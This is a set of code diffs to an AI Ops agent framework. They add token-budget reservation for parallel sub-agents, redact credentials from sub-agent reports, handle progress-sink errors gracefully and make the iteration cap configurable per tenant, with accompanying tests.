+        let peak = 0;
+        vi.mocked(runSubagent).mockImplementation(async () => {
+            active++; peak = Math.max(peak, active);
+            await new Promise(r => setTimeout(r, 10));
+            active--;
+            return okResult;
+        });
+
+        const budget = { ...BUDGET, maxConcurrentSubagents: 2, maxSubagentsPerRun: 6 };
+        const tool = makeTool(budget);
+        await Promise.all(Array.from({ length: 5 }, (_, i) =>
+            tool.invoke({ role: `r${i}`, task: 't', expectedOutput: 'e' })));
+
+        expect(peak).toBeLessThanOrEqual(2);
+    });
+});

--- a/apps/web-ui/lib/agent/dispatch-agent-tool.test.ts
+++ b/apps/web-ui/lib/agent/dispatch-agent-tool.test.ts
@@ -137,4 +137,21 @@ describe('dispatch_agent tool', () => {
 
         expect(peak).toBeLessThanOrEqual(2);
     });
+
+    it('does not reject when the progress sink throws', async () => {
+        // The chat route's sink enqueues onto a ReadableStream, which throws once
+        // the client disconnects — so a throwing sink is the normal client-abort
+        // case, not a hypothetical. The tool must still return its report.
+        const budget = BUDGET;
+        const tool = createDispatchAgentTool({
+            model: {},
+            subagentTools: [],
+            ledger: createRunBudgetLedger(budget),
+            budget,
+            onSubagentEvent: () => { throw new Error('sink exploded'); },
+        });
+
+        await expect(tool.invoke({ role: 'a', task: 't', expectedOutput: 'e' }))
+            .resolves.toContain('i-123 idle');
+    });
 });

--- a/apps/web-ui/lib/agent/dispatch-agent-tool.test.ts
+++ b/apps/web-ui/lib/agent/dispatch-agent-tool.test.ts
@@ -88,6 +88,35 @@ describe('dispatch_agent tool', () => {
         expect(result).not.toContain('INTERNAL_REASONING_MARKER');
     });
 
+    it('redacts the report before it reaches the orchestrator', async () => {
+        // The return value becomes a ToolMessage in the orchestrator's message list,
+        // and route.ts persists every new message VERBATIM. That reaches two at-rest
+        // sinks the subagent repository's redaction does not cover: `chat_messages`
+        // (30-day TTL, and replayed to the browser by /api/threads/[id]/history) and
+        // the LangGraph PostgresSaver checkpoint tables, which have NO TTL at all.
+        vi.mocked(runSubagent).mockResolvedValue({
+            ...okResult,
+            report: 'api-worker connects to postgres://admin:letmein@db.internal:5432/app',
+        });
+
+        const result = await makeTool().invoke({ role: 'a', task: 't', expectedOutput: 'e' });
+
+        expect(result).not.toContain('letmein');
+        // Redacting must not change the type — LangGraph requires a string.
+        expect(typeof result).toBe('string');
+        // The finding stays actionable: only the credential is withheld.
+        expect(result).toContain('db.internal');
+    });
+
+    it('leaves a report with no secrets in it byte-identical', async () => {
+        // Over-redaction fails the operator too: a report the model worked hard to
+        // compose must survive the boundary unchanged when it carries nothing secret.
+        const clean = 'Findings: i-0abc123 (t3.medium) idle at 2% CPU; arn:aws:lambda:us-east-1:123456789012:function:api-worker last modified 2026-07-26.';
+        vi.mocked(runSubagent).mockResolvedValue({ ...okResult, report: clean });
+
+        expect(await makeTool().invoke({ role: 'a', task: 't', expectedOutput: 'e' })).toBe(clean);
+    });
+
     it('degrades gracefully instead of throwing when the budget is exhausted', async () => {
         const tool = makeTool({ ...BUDGET, maxSubagentsPerRun: 1 });
         await tool.invoke({ role: 'a', task: 't', expectedOutput: 'e' });

--- a/apps/web-ui/lib/agent/dispatch-agent-tool.test.ts
+++ b/apps/web-ui/lib/agent/dispatch-agent-tool.test.ts
@@ -6,16 +6,26 @@ vi.mock('./subagent', async (importOriginal) => {
 });
 
 import { runSubagent } from './subagent';
-import { createRunBudgetLedger, createDispatchAgentTool } from './dispatch-agent-tool';
+import { createRunBudgetLedger, createDispatchAgentTool, estimateSubagentTokens } from './dispatch-agent-tool';
 
 const BUDGET = {
     enabled: true,
     maxConcurrentSubagents: 2,
     maxSubagentsPerRun: 3,
-    maxSubagentTokensPerRun: 1000,
+    // Large enough that the COUNT limit is what bites in the tests below that are
+    // about the count. Token-ceiling behaviour gets its own describe block, where
+    // the budget is sized deliberately against `estimateSubagentTokens`.
+    maxSubagentTokensPerRun: 200_000,
     subagentMaxIterations: 4,
     subagentTimeoutMs: 5000,
 };
+
+/** Reserve and immediately settle, i.e. "this much has already been spent". */
+function spend(ledger: ReturnType<typeof createRunBudgetLedger>, tokensIn: number, tokensOut: number) {
+    const verdict = ledger.tryReserve();
+    if (!verdict.ok) throw new Error(`expected a reservation, got: ${verdict.reason}`);
+    verdict.reservation.settle(tokensIn, tokensOut);
+}
 
 const okResult = {
     report: 'Findings: i-123 idle', toolCount: 2, tokensIn: 300, tokensOut: 50,
@@ -41,7 +51,7 @@ describe('createRunBudgetLedger', () => {
 
     it('refuses once the token budget is spent', () => {
         const ledger = createRunBudgetLedger(BUDGET);
-        ledger.recordSpend(900, 200);
+        spend(ledger, 190_000, 5_000);
 
         const verdict = ledger.tryReserve();
         expect(verdict.ok).toBe(false);
@@ -51,6 +61,111 @@ describe('createRunBudgetLedger', () => {
     it('refuses everything when the budget is disabled', () => {
         const ledger = createRunBudgetLedger({ ...BUDGET, enabled: false });
         expect(ledger.tryReserve().ok).toBe(false);
+    });
+});
+
+describe('createRunBudgetLedger — the token ceiling actually binds (F4)', () => {
+    it('bounds a concurrent fan-out by the TOKEN budget, not only the count', () => {
+        // THE DEFECT. ToolNode dispatches a turn's dispatch_agent calls concurrently,
+        // so every tryReserve runs BEFORE any sub-agent finishes and reports usage.
+        // A ledger that gates on settled spend alone therefore consults the token
+        // budget only after the fan-out it exists to bound has already been granted.
+        const budget = { ...BUDGET, maxSubagentsPerRun: 16, maxSubagentTokensPerRun: 50_000 };
+        const ledger = createRunBudgetLedger(budget);
+        const estimate = estimateSubagentTokens(budget);
+
+        // No settle() calls in between — this is the real fan-out ordering.
+        const verdicts = Array.from({ length: 16 }, () => ledger.tryReserve());
+        const granted = verdicts.filter(v => v.ok).length;
+
+        expect(granted).toBe(Math.floor(50_000 / estimate));
+        expect(granted).toBeLessThan(16);
+        const refusal = verdicts.find(v => !v.ok) as { reason: string };
+        expect(refusal.reason).toMatch(/token budget/i);
+    });
+
+    it('reconciles: a sub-agent that came in under estimate frees the difference', () => {
+        const budget = { ...BUDGET, maxSubagentsPerRun: 16, maxSubagentTokensPerRun: 50_000 };
+        const ledger = createRunBudgetLedger(budget);
+        const estimate = estimateSubagentTokens(budget);
+        const capacity = Math.floor(50_000 / estimate);
+
+        const held = Array.from({ length: capacity }, () => ledger.tryReserve());
+        expect(held.every(v => v.ok)).toBe(true);
+        expect(ledger.tryReserve().ok).toBe(false);
+
+        // Each one actually cost a fraction of its reservation. Releasing the
+        // difference must let the run keep fanning out.
+        for (const v of held) {
+            if (v.ok) v.reservation.settle(100, 20);
+        }
+        expect(ledger.tryReserve().ok).toBe(true);
+    });
+
+    it('settle is idempotent — a double release cannot mint budget', () => {
+        const budget = { ...BUDGET, maxSubagentsPerRun: 16, maxSubagentTokensPerRun: 50_000 };
+        const ledger = createRunBudgetLedger(budget);
+        const estimate = estimateSubagentTokens(budget);
+
+        const first = ledger.tryReserve();
+        if (!first.ok) throw new Error('expected a reservation');
+        first.reservation.settle(estimate, 0);
+        first.reservation.settle(estimate, 0);
+        first.reservation.settle(estimate, 0);
+
+        // One sub-agent that spent exactly its estimate leaves room for the rest —
+        // no more, no less. Triple-settling must not have triple-counted the spend
+        // (which would refuse too early) nor triple-released (which would overspend).
+        const remaining = Array.from({ length: 16 }, () => ledger.tryReserve()).filter(v => v.ok).length;
+        expect(remaining).toBe(Math.floor(50_000 / estimate) - 1);
+    });
+
+    it('distinguishes the count refusal from the token refusal', () => {
+        const countBound = createRunBudgetLedger({ ...BUDGET, maxSubagentsPerRun: 1, maxSubagentTokensPerRun: 1_000_000 });
+        countBound.tryReserve();
+        const byCount = countBound.tryReserve() as { reason: string };
+
+        const tokenBound = createRunBudgetLedger({ ...BUDGET, maxSubagentsPerRun: 16, maxSubagentTokensPerRun: 50_000 });
+        let byToken = tokenBound.tryReserve();
+        while (byToken.ok) byToken = tokenBound.tryReserve();
+
+        expect(byCount.reason).toMatch(/sub-agent limit/i);
+        expect(byCount.reason).not.toMatch(/token/i);
+        expect((byToken as { reason: string }).reason).toMatch(/token budget/i);
+    });
+
+    it('says so plainly when one sub-agent cannot fit in the whole budget', () => {
+        // A tenant who sets the minimum token budget alongside the maximum iteration
+        // count has configured a run that can afford zero sub-agents. Refusing with
+        // "token budget exhausted" before anything ran would be baffling; the message
+        // has to name the misconfiguration.
+        const ledger = createRunBudgetLedger({
+            ...BUDGET, subagentMaxIterations: 16, maxSubagentTokensPerRun: 50_000,
+        });
+        const verdict = ledger.tryReserve();
+
+        expect(verdict.ok).toBe(false);
+        expect((verdict as { reason: string }).reason).toMatch(/exceeds the entire/i);
+    });
+
+    it('holds no state across runs', () => {
+        const budget = { ...BUDGET, maxSubagentsPerRun: 16, maxSubagentTokensPerRun: 50_000 };
+        const exhausted = createRunBudgetLedger(budget);
+        let v = exhausted.tryReserve();
+        while (v.ok) v = exhausted.tryReserve();
+
+        expect(createRunBudgetLedger(budget).tryReserve().ok).toBe(true);
+    });
+
+    it('checks and increments synchronously, with no await in between', () => {
+        // Two concurrent callers must never both observe the same free capacity.
+        // An `await` anywhere between the check and the increment would reintroduce
+        // exactly that race, so the call must not be thenable at all.
+        const ledger = createRunBudgetLedger(BUDGET);
+        const verdict = ledger.tryReserve();
+
+        expect(verdict).not.toBeInstanceOf(Promise);
+        expect((verdict as unknown as { then?: unknown }).then).toBeUndefined();
     });
 });
 
@@ -165,6 +280,50 @@ describe('dispatch_agent tool', () => {
             tool.invoke({ role: `r${i}`, task: 't', expectedOutput: 'e' })));
 
         expect(peak).toBeLessThanOrEqual(2);
+    });
+
+    describe('reservation release (F4)', () => {
+        // A stranded reservation is worse than no ceiling at all: it silently starves
+        // the rest of the run. Every exit path must hand its capacity back.
+        const budget = { ...BUDGET, maxSubagentsPerRun: 16, maxSubagentTokensPerRun: 200_000 };
+        const estimate = estimateSubagentTokens(budget);
+        const capacity = Math.floor(200_000 / estimate);
+
+        type ResultOverride = Partial<Omit<typeof okResult, 'status'>> & { status?: 'done' | 'failed' };
+
+        const runOnceWith = async (result: ResultOverride | Error) => {
+            const ledger = createRunBudgetLedger(budget);
+            const tool = createDispatchAgentTool({ model: {}, subagentTools: [], ledger, budget });
+            if (result instanceof Error) vi.mocked(runSubagent).mockRejectedValue(result);
+            else vi.mocked(runSubagent).mockResolvedValue({ ...okResult, ...result });
+
+            await tool.invoke({ role: 'a', task: 't', expectedOutput: 'e' });
+            return ledger;
+        };
+
+        /** How many more sub-agents this ledger will admit. */
+        const remainingCapacity = (ledger: ReturnType<typeof createRunBudgetLedger>) =>
+            Array.from({ length: 16 }, () => ledger.tryReserve()).filter(v => v.ok).length;
+
+        it('releases on success, charging only what was actually used', async () => {
+            const ledger = await runOnceWith({ tokensIn: 300, tokensOut: 50 });
+            // 350 real tokens is a rounding error against the budget, so the run keeps
+            // essentially all of its capacity — it must NOT still be holding a full
+            // estimate for a sub-agent that has already finished.
+            expect(remainingCapacity(ledger)).toBe(Math.floor((200_000 - 350) / estimate));
+        });
+
+        it('releases when the sub-agent times out or fails internally', async () => {
+            const ledger = await runOnceWith({ status: 'failed', tokensIn: 100, tokensOut: 0 });
+            expect(remainingCapacity(ledger)).toBe(Math.floor((200_000 - 100) / estimate));
+        });
+
+        it('releases when the sub-agent runtime rejects outright', async () => {
+            // The catch path: a semaphore or sink failure spent no tokens, so the
+            // reservation must come back whole.
+            const ledger = await runOnceWith(new Error('semaphore exploded'));
+            expect(remainingCapacity(ledger)).toBe(capacity);
+        });
     });
 
     it('does not reject when the progress sink throws', async () => {

--- a/apps/web-ui/lib/agent/dispatch-agent-tool.ts
+++ b/apps/web-ui/lib/agent/dispatch-agent-tool.ts
@@ -25,6 +25,8 @@ export interface SubagentEvent {
     toolCount: number;
     tokensIn: number;
     tokensOut: number;
+    /** Name of the tool (batch) currently executing — the card's live action line. */
+    lastTool?: string;
     summary?: string;
     transcript?: SubagentTranscriptEntry[];
 }
@@ -234,10 +236,15 @@ Do NOT use it for:
 - work that depends on another sub-agent's output (they cannot see each other)
 - a single quick lookup you could do in one tool call
 
+SUB-AGENT CAPABILITIES — write the brief for THESE tools, no others:
+- Sub-agents have NO shell. execute_command does not exist for them. Never write CLI command lines, pipes, or shell substitutions like $(date ...) into the task — a brief written as shell commands wastes the sub-agent's entire iteration budget reconciling instructions it cannot follow.
+- Sub-agents reach AWS only through the structured aws_read tool: they name a service (e.g. ec2, cloudwatch), an operation (e.g. describe-instances, get-metric-statistics), and parameters. Write the brief as investigation GOALS plus which services/operations to use — e.g. "list EC2 instances via ec2 describe-instances, then fetch each instance's 14-day average CPUUtilization via cloudwatch get-metric-statistics".
+- Sub-agents call get_aws_credentials themselves; give them the account id and region, not a profile name or bootstrap instructions.
+
 CRITICAL: "task" must be completely self-contained. The sub-agent sees NONE of this conversation — no account ids, no prior findings, no user context unless you write them into the task. A vague brief returns a useless report.`,
             schema: z.object({
-                role: z.string().describe('Short identity for this sub-agent, e.g. "EC2 idle-resource auditor for account 123456789012"'),
-                task: z.string().describe('Complete standalone brief: what to investigate, which account ids and regions, which tools to prefer, and any constraints. Assume zero shared context.'),
+                role: z.string().describe('Short identity for this sub-agent. MUST name the specific account id, region, or service it covers so parallel cards are distinguishable — e.g. "EC2 idle auditor — 123456789012 (ap-south-1)". Never reuse the same role string for two dispatches in one turn.'),
+                task: z.string().describe('Complete standalone brief: what to investigate, which account ids and regions, which aws_read service/operations to use, and any constraints. Goals and operations only — NO shell command lines. Assume zero shared context.'),
                 expectedOutput: z.string().describe('Exactly what the report must contain, e.g. "instance ids with average CPU below 5% over 14 days, with the metric value for each"'),
             }),
         },

--- a/apps/web-ui/lib/agent/dispatch-agent-tool.ts
+++ b/apps/web-ui/lib/agent/dispatch-agent-tool.ts
@@ -15,6 +15,7 @@ import { randomUUID } from 'crypto';
 import { Semaphore } from './concurrency';
 import { runSubagent, type SubagentTranscriptEntry } from './subagent';
 import type { SubagentBudgetConfig } from './subagent-budget';
+import { redactTranscript } from './subagent-redact';
 
 export interface SubagentEvent {
     id: string;
@@ -123,7 +124,14 @@ export function createDispatchAgentTool(deps: DispatchAgentDeps) {
                     transcript: result.transcript,
                 });
 
-                return result.report;
+                // Redact HERE, not only in the repository. This return value becomes a
+                // ToolMessage in the orchestrator's message list, and the chat route
+                // persists every new message verbatim — reaching two at-rest sinks the
+                // repository never sees: `chat_messages` (30-day TTL, and replayed to
+                // the browser by /api/threads/[threadId]/history) and the LangGraph
+                // checkpoint tables, which have no TTL at all. Redacting at the source
+                // covers all three sinks and the orchestrator's own context.
+                return redactTranscript(result.report);
             } catch (error) {
                 // runSubagent is already total, but a semaphore or emit failure must
                 // not propagate into ToolNode and abort the orchestrator's turn.

--- a/apps/web-ui/lib/agent/dispatch-agent-tool.ts
+++ b/apps/web-ui/lib/agent/dispatch-agent-tool.ts
@@ -1,0 +1,144 @@
+/**
+ * dispatch_agent — the sub-agent fan-out tool.
+ *
+ * One sub-agent per tool call, deliberately: the orchestrator emits N calls in a
+ * single turn and ToolNode's existing concurrency performs the fan-out, so there
+ * is no second concurrency mechanism and each sub-agent gets its own tool card
+ * in the UI for free.
+ *
+ * Budget exhaustion NEVER fails the run. The tool returns an instruction to do
+ * the work serially, so behaviour degrades to the pre-sub-agent baseline.
+ */
+import { tool } from '@langchain/core/tools';
+import { z } from 'zod';
+import { randomUUID } from 'crypto';
+import { Semaphore } from './concurrency';
+import { runSubagent, type SubagentTranscriptEntry } from './subagent';
+import type { SubagentBudgetConfig } from './subagent-budget';
+
+export interface SubagentEvent {
+    id: string;
+    role: string;
+    task: string;
+    status: 'running' | 'done' | 'failed';
+    toolCount: number;
+    tokensIn: number;
+    tokensOut: number;
+    summary?: string;
+    transcript?: SubagentTranscriptEntry[];
+}
+
+export interface RunBudgetLedger {
+    tryReserve(): { ok: true } | { ok: false; reason: string };
+    recordSpend(tokensIn: number, tokensOut: number): void;
+    semaphore: Semaphore;
+}
+
+/**
+ * Per-run ledger. Runs execute on a single ECS replica, so in-process counters
+ * are sufficient — no distributed coordination needed.
+ */
+export function createRunBudgetLedger(budget: SubagentBudgetConfig): RunBudgetLedger {
+    let dispatched = 0;
+    let tokensSpent = 0;
+    const semaphore = new Semaphore(budget.maxConcurrentSubagents);
+
+    return {
+        tryReserve() {
+            if (!budget.enabled) {
+                return { ok: false, reason: 'sub-agents are disabled for this organization' };
+            }
+            if (dispatched >= budget.maxSubagentsPerRun) {
+                return { ok: false, reason: `per-run sub-agent limit reached (${budget.maxSubagentsPerRun})` };
+            }
+            if (tokensSpent >= budget.maxSubagentTokensPerRun) {
+                return { ok: false, reason: `sub-agent token budget exhausted (${budget.maxSubagentTokensPerRun})` };
+            }
+            dispatched++;
+            return { ok: true };
+        },
+        recordSpend(tokensIn: number, tokensOut: number) {
+            tokensSpent += tokensIn + tokensOut;
+        },
+        semaphore,
+    };
+}
+
+export interface DispatchAgentDeps {
+    model: unknown;
+    subagentTools: Array<{ name: string; invoke: (args: Record<string, unknown>) => Promise<unknown> }>;
+    ledger: RunBudgetLedger;
+    budget: SubagentBudgetConfig;
+    onSubagentEvent?: (event: SubagentEvent) => void;
+}
+
+const DEGRADE_PREFIX = 'Sub-agent budget exhausted';
+
+export function createDispatchAgentTool(deps: DispatchAgentDeps) {
+    return tool(
+        async ({ role, task, expectedOutput }: { role: string; task: string; expectedOutput: string }) => {
+            const reservation = deps.ledger.tryReserve();
+            if (!reservation.ok) {
+                return `${DEGRADE_PREFIX}: ${reservation.reason}. Perform this work yourself, serially, using your own tools.`;
+            }
+
+            const id = randomUUID();
+            const emit = (event: Partial<SubagentEvent> & Pick<SubagentEvent, 'status'>) =>
+                deps.onSubagentEvent?.({
+                    id, role, task, toolCount: 0, tokensIn: 0, tokensOut: 0, ...event,
+                });
+
+            emit({ status: 'running' });
+
+            try {
+                const result = await deps.ledger.semaphore.run(() => runSubagent(
+                    { role, task, expectedOutput },
+                    {
+                        model: deps.model as never,
+                        tools: deps.subagentTools,
+                        budget: deps.budget,
+                        onEvent: progress => emit({ status: 'running', ...progress }),
+                    },
+                ));
+
+                deps.ledger.recordSpend(result.tokensIn, result.tokensOut);
+
+                emit({
+                    status: result.status === 'failed' ? 'failed' : 'done',
+                    toolCount: result.toolCount,
+                    tokensIn: result.tokensIn,
+                    tokensOut: result.tokensOut,
+                    summary: result.report,
+                    transcript: result.transcript,
+                });
+
+                return result.report;
+            } catch (error) {
+                // runSubagent is already total, but a semaphore or emit failure must
+                // not propagate into ToolNode and abort the orchestrator's turn.
+                const message = error instanceof Error ? error.message : String(error);
+                console.error(`[dispatch_agent] "${role}" failed: ${message}`);
+                emit({ status: 'failed', summary: message });
+                return `The sub-agent "${role}" failed: ${message}. Continue with the information you already have, or perform this work yourself.`;
+            }
+        },
+        {
+            name: 'dispatch_agent',
+            description: `Delegate an INDEPENDENT read-only investigation to a sub-agent that works in its own context and returns a compressed findings report.
+
+Use this when the task splits into parts that do not depend on each other — one account each, one region each, one service each. Emit SEVERAL dispatch_agent calls in a SINGLE turn and they run in parallel; that is the entire point.
+
+Do NOT use it for:
+- anything that changes state (sub-agents are read-only — do mutations yourself)
+- work that depends on another sub-agent's output (they cannot see each other)
+- a single quick lookup you could do in one tool call
+
+CRITICAL: "task" must be completely self-contained. The sub-agent sees NONE of this conversation — no account ids, no prior findings, no user context unless you write them into the task. A vague brief returns a useless report.`,
+            schema: z.object({
+                role: z.string().describe('Short identity for this sub-agent, e.g. "EC2 idle-resource auditor for account 123456789012"'),
+                task: z.string().describe('Complete standalone brief: what to investigate, which account ids and regions, which tools to prefer, and any constraints. Assume zero shared context.'),
+                expectedOutput: z.string().describe('Exactly what the report must contain, e.g. "instance ids with average CPU below 5% over 14 days, with the metric value for each"'),
+            }),
+        },
+    );
+}

--- a/apps/web-ui/lib/agent/dispatch-agent-tool.ts
+++ b/apps/web-ui/lib/agent/dispatch-agent-tool.ts
@@ -29,9 +29,48 @@ export interface SubagentEvent {
     transcript?: SubagentTranscriptEntry[];
 }
 
+/**
+ * Tokens a single model call carries beyond the transcript: the sub-agent system
+ * prompt, the standalone task brief, and the report instructions.
+ */
+const PROMPT_BASE_TOKENS = 2_000;
+
+/**
+ * Tokens one tool result contributes. Derived, not guessed: `subagent.ts` caps
+ * every tool output at SUBAGENT_TOOL_OUTPUT_MAX_CHARS (4000) before it enters the
+ * message list, and ~4 characters per token is the standard approximation.
+ */
+const TOOL_RESULT_TOKENS = 1_000;
+
+/**
+ * Worst-case token cost of one sub-agent, used to reserve capacity at dispatch.
+ *
+ * A sub-agent re-sends its whole transcript on every model call, so cost is
+ * QUADRATIC in the iteration count, not linear: iteration i carries i-1 prior tool
+ * results. Summing over N iterations gives N·base + (N²/2)·result. A linear
+ * estimate looks safe at the default N=8 and badly under-reserves at the maximum
+ * N=16 — which is precisely where a ceiling needs to hold.
+ *
+ * Over-estimating costs only CONCURRENT admission, never throughput: the
+ * reservation is released and replaced by actual usage the moment the sub-agent
+ * finishes, so later dispatches in the same run reserve against real numbers.
+ */
+export function estimateSubagentTokens(budget: SubagentBudgetConfig): number {
+    const n = Math.max(1, budget.subagentMaxIterations);
+    return n * PROMPT_BASE_TOKENS + Math.ceil((n * n) / 2) * TOOL_RESULT_TOKENS;
+}
+
+/** Capacity held by one in-flight sub-agent, returned when it settles. */
+export interface BudgetReservation {
+    /**
+     * Release this reservation and charge what the sub-agent actually used.
+     * Idempotent — a double settle can neither mint budget nor double-charge.
+     */
+    settle(tokensIn: number, tokensOut: number): void;
+}
+
 export interface RunBudgetLedger {
-    tryReserve(): { ok: true } | { ok: false; reason: string };
-    recordSpend(tokensIn: number, tokensOut: number): void;
+    tryReserve(): { ok: true; reservation: BudgetReservation } | { ok: false; reason: string };
     semaphore: Semaphore;
 }
 
@@ -41,7 +80,11 @@ export interface RunBudgetLedger {
  */
 export function createRunBudgetLedger(budget: SubagentBudgetConfig): RunBudgetLedger {
     let dispatched = 0;
+    /** Reconciled usage, from sub-agents that have finished. */
     let tokensSpent = 0;
+    /** Estimated capacity held by sub-agents still in flight. */
+    let tokensReserved = 0;
+    const estimate = estimateSubagentTokens(budget);
     const semaphore = new Semaphore(budget.maxConcurrentSubagents);
 
     return {
@@ -52,14 +95,41 @@ export function createRunBudgetLedger(budget: SubagentBudgetConfig): RunBudgetLe
             if (dispatched >= budget.maxSubagentsPerRun) {
                 return { ok: false, reason: `per-run sub-agent limit reached (${budget.maxSubagentsPerRun})` };
             }
-            if (tokensSpent >= budget.maxSubagentTokensPerRun) {
-                return { ok: false, reason: `sub-agent token budget exhausted (${budget.maxSubagentTokensPerRun})` };
+            // Gate on spent + IN-FLIGHT + this one. ToolNode dispatches a turn's
+            // dispatch_agent calls concurrently, so gating on settled spend alone
+            // consults the budget only after the fan-out it exists to bound has
+            // already been granted — every reservation would see tokensSpent === 0.
+            if (tokensSpent + tokensReserved + estimate > budget.maxSubagentTokensPerRun) {
+                const reason = estimate > budget.maxSubagentTokensPerRun
+                    // Not exhaustion — a misconfiguration. Nothing has run, and
+                    // nothing ever will, so name the two settings involved rather
+                    // than reporting an empty budget as spent.
+                    ? `one sub-agent's estimated cost (${estimate} tokens at ${budget.subagentMaxIterations} iterations) exceeds the entire run token budget (${budget.maxSubagentTokensPerRun}) — raise the token budget or lower the iteration limit`
+                    : `sub-agent token budget exhausted (${budget.maxSubagentTokensPerRun})`;
+                return { ok: false, reason };
             }
+
+            // Check and increment stay in one synchronous block. An `await`
+            // anywhere between them would let two concurrent callers observe the
+            // same free capacity and both be admitted.
             dispatched++;
-            return { ok: true };
-        },
-        recordSpend(tokensIn: number, tokensOut: number) {
-            tokensSpent += tokensIn + tokensOut;
+            tokensReserved += estimate;
+
+            let settled = false;
+            return {
+                ok: true,
+                reservation: {
+                    settle(tokensIn: number, tokensOut: number) {
+                        // Guard against a double release: the dispatch tool settles
+                        // in a `finally`, and an unusual path could reach it twice.
+                        // Releasing twice would mint capacity that was never held.
+                        if (settled) return;
+                        settled = true;
+                        tokensReserved -= estimate;
+                        tokensSpent += tokensIn + tokensOut;
+                    },
+                },
+            };
         },
         semaphore,
     };
@@ -102,6 +172,12 @@ export function createDispatchAgentTool(deps: DispatchAgentDeps) {
 
             emit({ status: 'running' });
 
+            // Actual usage, reconciled against the reservation in the `finally`
+            // below. A sub-agent that throws before reporting usage spent nothing
+            // we can attribute, so its reservation comes back whole.
+            let actualIn = 0;
+            let actualOut = 0;
+
             try {
                 const result = await deps.ledger.semaphore.run(() => runSubagent(
                     { role, task, expectedOutput },
@@ -113,7 +189,8 @@ export function createDispatchAgentTool(deps: DispatchAgentDeps) {
                     },
                 ));
 
-                deps.ledger.recordSpend(result.tokensIn, result.tokensOut);
+                actualIn = result.tokensIn;
+                actualOut = result.tokensOut;
 
                 emit({
                     status: result.status === 'failed' ? 'failed' : 'done',
@@ -139,6 +216,11 @@ export function createDispatchAgentTool(deps: DispatchAgentDeps) {
                 console.error(`[dispatch_agent] "${role}" failed: ${message}`);
                 emit({ status: 'failed', summary: message });
                 return `The sub-agent "${role}" failed: ${message}. Continue with the information you already have, or perform this work yourself.`;
+            } finally {
+                // Must run on EVERY exit path — success, internal failure, timeout,
+                // and the catch above. A reservation stranded by a failed sub-agent
+                // starves the rest of the run of capacity it never actually used.
+                reservation.reservation.settle(actualIn, actualOut);
             }
         },
         {

--- a/apps/web-ui/lib/agent/dispatch-agent-tool.ts
+++ b/apps/web-ui/lib/agent/dispatch-agent-tool.ts
@@ -83,10 +83,21 @@ export function createDispatchAgentTool(deps: DispatchAgentDeps) {
             }
 
             const id = randomUUID();
-            const emit = (event: Partial<SubagentEvent> & Pick<SubagentEvent, 'status'>) =>
-                deps.onSubagentEvent?.({
-                    id, role, task, toolCount: 0, tokensIn: 0, tokensOut: 0, ...event,
-                });
+            // The sink is supplied by the caller (the chat route enqueues onto a
+            // ReadableStream, which throws once the client disconnects). Swallow
+            // here rather than at each call site: the first emit runs before the
+            // try below, so a throwing sink would otherwise reject the tool call
+            // itself — consuming a budget reservation and handing the model a
+            // "fix your mistakes" error instead of the do-it-yourself instruction.
+            const emit = (event: Partial<SubagentEvent> & Pick<SubagentEvent, 'status'>) => {
+                try {
+                    deps.onSubagentEvent?.({
+                        id, role, task, toolCount: 0, tokensIn: 0, tokensOut: 0, ...event,
+                    });
+                } catch (err) {
+                    console.warn(`[dispatch_agent] progress sink threw (ignored): ${err instanceof Error ? err.message : String(err)}`);
+                }
+            };
 
             emit({ status: 'running' });
 

--- a/apps/web-ui/lib/agent/fast-agent.ts
+++ b/apps/web-ui/lib/agent/fast-agent.ts
@@ -33,9 +33,15 @@ import { createMemoryRecallNode, createMemorySaveNode } from "./memory-nodes";
 import { prepareContext, buildWorkingMemorySection } from "./memory/working-memory";
 import { createGuardNode } from "./guard";
 import { routeAfterGuard } from "./gate-routing";
+import { getAiopsFeatures, resolveAiopsFeatures } from './aiops-features';
 
 // --- FAST GRAPH (Reflection Agent Mode) ---
 export async function createFastGraph(config: GraphConfig) {
+    // Tenant-tunable run cap (AI Ops console settings) — same knob as the
+    // planning agent; MAX_ITERATIONS is only the default.
+    const maxIterations = config.tenantId
+        ? (await resolveAiopsFeatures(config.tenantId).catch(() => getAiopsFeatures(config.tenantId))).maxIterations
+        : MAX_ITERATIONS;
     const { model: modelConfig, autoApprove, accounts, accountId, accountName, selectedSkill, mcpServerIds, tenantId } = config;
     const modelId = modelConfig.modelId;
     const checkpointer = await getCheckpointer();
@@ -45,7 +51,9 @@ export async function createFastGraph(config: GraphConfig) {
     // prompt and reused by the reflector below — no repeated queries.
     const skillContent = selectedSkill && tenantId ? (await getSkillContent(tenantId, selectedSkill)) || '' : '';
     if (selectedSkill) {
-        console.log(skillContent ? `[FastAgent] Loaded skill: ${selectedSkill}` : `[FastAgent] No content for skill: ${selectedSkill}`);
+        // The char count is the observable proof of injection: this exact string is
+        // concatenated into the system prompt below. (LLM_AUDIT=true dumps it verbatim.)
+        console.log(skillContent ? `[FastAgent] Loaded skill: ${selectedSkill} (${skillContent.length.toLocaleString()} chars injected into system prompt)` : `[FastAgent] No content for skill: ${selectedSkill}`);
     }
     // Skill catalog for progressive disclosure — gated by the console "Auto
     // skills" toggle (default on). The zero-skill sentinel string must not leak
@@ -97,7 +105,7 @@ export async function createFastGraph(config: GraphConfig) {
         const { messages, iterationCount, memoryContext } = state;
 
         console.log(`\n================================================================================`);
-        console.log(`🚀 [FAST AGENT] Generator Iteration ${iterationCount + 1}/${MAX_ITERATIONS}`);
+        console.log(`🚀 [FAST AGENT] Generator Iteration ${iterationCount + 1}/${maxIterations}`);
         console.log(`   Model: ${modelId}`);
         console.log(`================================================================================\n`);
 
@@ -298,14 +306,14 @@ Please narrow the question or ask me to continue from here.`;
         const hasPendingToolCalls = !!(lastMessage.tool_calls && lastMessage.tool_calls.length > 0);
 
         // Hard cap FIRST — prevents unbounded loops when model keeps generating tool_calls
-        if (iterationCount >= MAX_ITERATIONS) {
+        if (iterationCount >= maxIterations) {
             // If the model still wants tools, they will not run — synthesize a final answer
             // so the user never gets an empty response and we never persist an orphaned tool_use.
             if (hasPendingToolCalls) {
-                console.log(`⚠️ Max iterations (${MAX_ITERATIONS}) reached with pending tool calls. Synthesizing final answer.`);
+                console.log(`⚠️ Max iterations (${maxIterations}) reached with pending tool calls. Synthesizing final answer.`);
                 return "finalize";
             }
-            console.log(`⚠️ Max iterations (${MAX_ITERATIONS}) reached. Stopping.`);
+            console.log(`⚠️ Max iterations (${maxIterations}) reached. Stopping.`);
             return "memory_save";
         }
 

--- a/apps/web-ui/lib/agent/memory-nodes.ts
+++ b/apps/web-ui/lib/agent/memory-nodes.ts
@@ -104,7 +104,7 @@ Return only the relevant memories.`
 
         // ── Learned operating rules — distance-gated, no LLM filter ─────────
         let proceduresSection = "";
